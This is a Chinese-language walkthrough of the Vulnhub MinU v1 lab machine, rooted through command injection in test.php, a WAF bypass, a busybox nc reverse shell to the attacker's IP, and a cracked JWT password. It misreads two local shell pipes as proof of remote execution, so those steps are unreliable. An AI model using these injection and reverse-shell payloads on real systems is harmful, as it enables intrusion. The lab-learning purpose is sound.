Vulnhub MinU v1靶机解题过程
MinU v1
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/MinUv1]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.74.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:0b:cc:58 1 60 PCS Systemtechnik GmbH
192.168.56.106 08:00:27:4c:1a:88 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdisover工具识别目标主机的IP地址为192.168.56.106
NMAP扫描
──(kali㉿kali)-[~/Vulnhub/MinUv1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-31 01:25 EDT
Nmap scan report for localhost (192.168.56.106)
Host is up (0.00022s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.27
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.27 (Ubuntu)
MAC Address: 08:00:27:4C:1A:88 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.1.1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.13 seconds
NMAP扫描仅发现一个开放端口80
Get Access
用浏览器访问目标主机的80端口,返回的是apache的默认页面。
──(kali㉿kali)-[~/Vulnhub/MinUv1]
└─$ searchsploit apache 2.4.27
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation | linux/local/46676.php
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | linux/webapps/42745.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal | linux/webapps/39642.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1) | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) | jsp/webapps/42966.py
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution | linux/remote/34.pl
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Apache该版本下没有可利用的漏洞,目标站点也不存在robots.txt文件。
┌──(kali㉿kali)-[/etc/apt]
└─$ gobuster dir -u http://192.168.56.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -v
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.106
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Verbose: true
[+] Timeout: 10s
===============================================================
2022/10/31 01:44:50 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.106/091a8460-fe80-4439-8708-05074047dc49 => 403 (Length: 325). To continue please exclude the status code or the length
┌──(kali㉿kali)-[/etc/apt]
└─$ dirb http://192.168.56.106
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Oct 31 01:45:31 2022
URL_BASE: http://192.168.56.106/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.106/ ----
+ http://192.168.56.106/.config (CODE:403|SIZE:296)
+ http://192.168.56.106/_vti_bin/_vti_adm/admin.dll (CODE:403|SIZE:316)
+ http://192.168.56.106/_vti_bin/_vti_aut/author.dll (CODE:403|SIZE:317)
+ http://192.168.56.106/_vti_bin/shtml.dll (CODE:403|SIZE:307)
+ http://192.168.56.106/awstats.conf (CODE:403|SIZE:301)
+ http://192.168.56.106/development.log (CODE:403|SIZE:304)
+ http://192.168.56.106/global.asa (CODE:403|SIZE:299)
+ http://192.168.56.106/global.asax (CODE:403|SIZE:300)
+ http://192.168.56.106/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.106/main.mdb (CODE:403|SIZE:297)
+ http://192.168.56.106/php.ini (CODE:403|SIZE:296)
+ http://192.168.56.106/production.log (CODE:403|SIZE:303)
+ http://192.168.56.106/readfile (CODE:403|SIZE:416)
+ http://192.168.56.106/server-status (CODE:403|SIZE:302)
+ http://192.168.56.106/spamlog.log (CODE:403|SIZE:300)
+ http://192.168.56.106/thumbs.db (CODE:403|SIZE:298)
+ http://192.168.56.106/Thumbs.db (CODE:403|SIZE:298)
+ http://192.168.56.106/WS_FTP.LOG (CODE:403|SIZE:299)
-----------------
END_TIME: Mon Oct 31 01:45:41 2022
DOWNLOADED: 4612 - FOUND: 18
┌──(kali㉿kali)-[/etc/apt]
接下来扫描一下文件:
──(kali㉿kali)-[/etc/apt]
└─$ gobuster dir -u http://192.168.56.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.106
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2022/10/31 01:49:43 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.106/187b8151-f319-492a-bd7f-739c63b9d286 => 403 (Length: 325). To continue please exclude the status code or the length
没有任何收获,改用dirb扫描
┌──(kali㉿kali)-[/etc/apt]
└─$ dirb http://192.168.56.106 -X .php,.html,.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Oct 31 01:50:37 2022
URL_BASE: http://192.168.56.106/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php,.html,.txt) | (.php)(.html)(.txt) [NUM = 3]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.106/ ----
+ http://192.168.56.106/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.106/test.php (CODE:200|SIZE:1986)
-----------------
END_TIME: Mon Oct 31 01:51:07 2022
DOWNLOADED: 13836 - FOUND: 2
竟然发现了test.php文件
──(kali㉿kali)-[/etc/apt]
└─$ curl http://192.168.56.106/test.php
<!DOCTYPE html>
<html>
<head>
<title>OMGJS</title>
<script src='client.min.js'></script>
</head>
<body>
<h2>OMGJS - <strike>Everything</strike> a browser knows about you</h2>
<small>It actually knows more...</small>
<noscript>No js yay!</noscript>
<p id='data'></p>
<a href='test.php?file=last.html'>Read last visitor data</a>
<script>
let xhttp = new XMLHttpRequest();
let xData;
xhttp.onreadystatechange = function() {if (this.readyState == 4 && this.status == 200) {xData = JSON.parse(xhttp.responseText);}};
xhttp.open("GET", "https://geoip-db.com/json/", false);
xhttp.send(null);
let client = new ClientJS();
let jsData = `<h4>Browser: </h4> ${client.getBrowser()} ${client.getBrowserMajorVersion()} ${client.getEngine()} ${client.getEngineVersion()}`;
jsData += `<h4>OS: </h4> ${client.getOS()} ${client.getOSVersion()}`;
jsData += `<h4>Screen: </h4> ${client.getScreenPrint()}`;
if (xData != null) {
jsData += `<h4>Location: </h4> ${xData.city} ${xData.state} ${xData.country_name}`;
jsData += `<h4>Latitude, Longitude: </h4> ${xData.latitude}, ${xData.longitude}`;
jsData += `<h4>IP: </h4> ${xData.IPv4}`;
}
jsData += `<h4>Plugins: </h4> ${client.getPlugins()}`;
jsData += `<h4>TimeZone, Language: </h4> ${client.getTimeZone()} ${client.getLanguage()}`;
jsData += `<h4>Mobile: </h4> ${client.isMobile()} Android: ${client.isMobileAndroid()} iPhone: ${client.isIphone()} iPad: ${client.isIpad()}`;
jsData += `<h4>Device: </h4> ${client.getDevice()} ${client.getDeviceType()}`;
jsData += `<h4>CPU: </h4> ${client.getCPU()}`;
jsData += `<h4>Local Storage, Session Storage, Cookies enabled: </h4> ${client.isLocalStorage()} ${client.isSessionStorage()} ${client.isCookie()}`;
document.getElementById('data').innerHTML = jsData;
</script>
</body>
</html>
返回结果页面中包含另一个页面
<a href='test.php?file=last.html
一般来说,此时应该可以联想到有本地文件包含漏洞
└─$ curl http://192.168.56.106/test.php?file=../../../../../../../etc/passwd
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /test.php
on this server.<br />
</p>
<hr>
<address>Apache/2.4.27 (Ubuntu) Server at 192.168.56.106 Port 80</address>
</body></html>
猜测有WAF或者过滤机制存在
接下来识别WAF
──(kali㉿kali)-[/etc/apt]
└─$ wafw00f http://192.168.56.106
______
/ \
( W00f! )
\ ____/
,, __ 404 Hack Not Found
|`-.__ / / __ __
/" _/ /_/ \ \ / /
*===* / \ \_/ / 405 Not Allowed
/ )__// \ /
/| / /---` 403 Forbidden
\\/` \ | / _ \
`\ /_\\_ 502 Bad Gateway / / \ \ 500 Internal Error
`_____``-` /_/ \_\
~ WAFW00F : v2.2.0 ~
The Web Application Firewall Fingerprinting Toolkit
[*] Checking http://192.168.56.106
[+] Generic Detection results:
[*] The site http://192.168.56.106 seems to be behind a WAF or some sort of security solution
[~] Reason: The response was different when the request wasn't made from a browser.
Normal response code is "200", while the response code to a modified request is "403"
[~] Number of requests: 4
可以识别出目标主机在WAF后面,但无法探测出何种类型的WAF。
接下来要模糊测试,测试出绕开WAF的方法
──(kali㉿kali)-[/etc/apt]
└─$ wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txt --hc 403 http://192.168.56.106/test.php?file=FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.106/test.php?file=FUZZ
Total requests: 468
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000003: 200 40 L 159 W 1986 Ch "FALSE"
000000013: 200 40 L 159 W 1986 Ch "65536"
000000001: 200 40 L 159 W 1986 Ch "A"
000000012: 200 40 L 159 W 1986 Ch "-20"
000000007: 200 40 L 159 W 1986 Ch "-1"
000000015: 200 40 L 159 W 1986 Ch "-26843545
wfuzz工具先不用设置过滤参数,然后看一下结果,然后加上参数过滤无用的结果
┌──(kali㉿kali)-[/etc/apt]
└─$ wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txt --hc 403 --hw 159 http://192.168.56.106/test.php?file=FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.106/test.php?file=FUZZ
Total requests: 468
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000046: 200 41 L 163 W 2033 Ch "|dir"
000000045: 200 41 L 162 W 2040 Ch "|id"
000000104: 403 11 L 32 W 297 Ch "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini"
Total time: 0
Processed Requests: 468
Filtered Requests: 4de
Requests/sec.: 0
得到了两个绕开的方法: |dir |id,验证一下
─(kali㉿kali)-[/etc/apt]
└─$ curl http://192.168.56.106/test.php?file=|dir
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1986 100 1986 0 0 300k 0 --:--:-- --:--:-- --:--:-- 323k
apt.conf.d auth.conf.d keyrings preferences.d sources.list sources.list.back sources.list.d trusted.gpg.d
┌──(kali㉿kali)-[/etc/apt]
└─$ curl http://192.168.56.106/test.php?file=|id
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1986 100 1986 0 0 360k 0 --:--:-- --:--:-- --:--:-- 387k
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),115(bluetooth),125(scanner),141(wireshark),143(kaboxer),144(vboxsf)
可以成功得到执行,
但目前只能执行不带参数的命令,而要执行reverse shell命令(带参数)就不行了
http://192.168.3.88/test.php?file=dayu;busybox nc 192.168.56.137 5555 -e sh
(哈哈,纯粹是看别人这么操作的)
在kali linux成功拿到了shell
┌──(kali㉿kali)-[/etc/apt]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.106] 52736
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@MinU:/var/www/html$
www-data@MinU:/var/www/html$ cd /home
cd /home
www-data@MinU:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Apr 24 2018 .
drwxr-xr-x 21 root root 4.0K Apr 24 2018 ..
drwxr-xr-x 2 bob bob 4.0K Apr 26 2018 bob
www-data@MinU:/home$ cd bob
cd bob
www-data@MinU:/home/bob$ ls -alh
ls -alh
total 12K
drwxr-xr-x 2 bob bob 4.0K Apr 26 2018 .
drwxr-xr-x 3 root root 4.0K Apr 24 2018 ..
-rw-r--r-- 1 bob bob 155 Apr 30 2018 ._pw_
www-data@MinU:/home/bob$ cat ._pw_
cat ._pw_
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg
是一个字符串,用百度搜索一下:
是一种json web token, 在github上面搜 jwt crack
https://github.com/brendan-rius/c-jwt-cracker
──(kali㉿kali)-[~/Vulnhub/MinUv1]
└─$ git clone https://github.com/brendan-rius/c-jwt-cracker.git
Cloning into 'c-jwt-cracker'...
remote: Enumerating objects: 73, done.
remote: Counting objects: 100% (11/11), done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 73 (delta 2), reused 7 (delta 0), pack-reused 62
Receiving objects: 100% (73/73), 26.27 KiB | 153.00 KiB/s, done.
Resolving deltas: 100% (33/33
), done.
──(kali㉿kali)-[~/Vulnhub/MinUv1/c-jwt-cracker]
└─$ sudo docker build . -t jwtcrack
对上述字符串进行破解,得到密码:mlnV1
www-data@MinU:/home/bob$ su - root
su - root
Password: mlnV1
root@MinU:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@MinU:~# ls /root
ls /root
flag.txt
root@MinU:~# pwd
pwd
/root
root@MinU:~# cat flag.txt
cat flag.txt
__ __ _ _ _ __
| \/ (_) | | | | /_ |
| \ / |_ _ __ | | | |_ _| |
| |\/| | | '_ \| | | \ \ / / |
| | | | | | | | |__| |\ V /| |
|_| |_|_|_| |_|\____/ \_/ |_|
# You got r00t!
flag{c89031ac1b40954bb9a0589adcb6d174}
# You probably know this by now but the webserver on this challenge is
# protected by mod_security and the owasp crs 3.0 project on paranoia level 3.
# The webpage is so poorly coded that even this configuration can be bypassed
# by using the bash wildcard ? that allows mod_security to let the command through.
# At least that is how the challenge was designed ;)
# Let me know if you got here using another method!
# contact@8bitsec.io
# @_8bitsec
root@MinU:~#
STRIVE FOR PROGRESS,NOT FOR PERFECTION
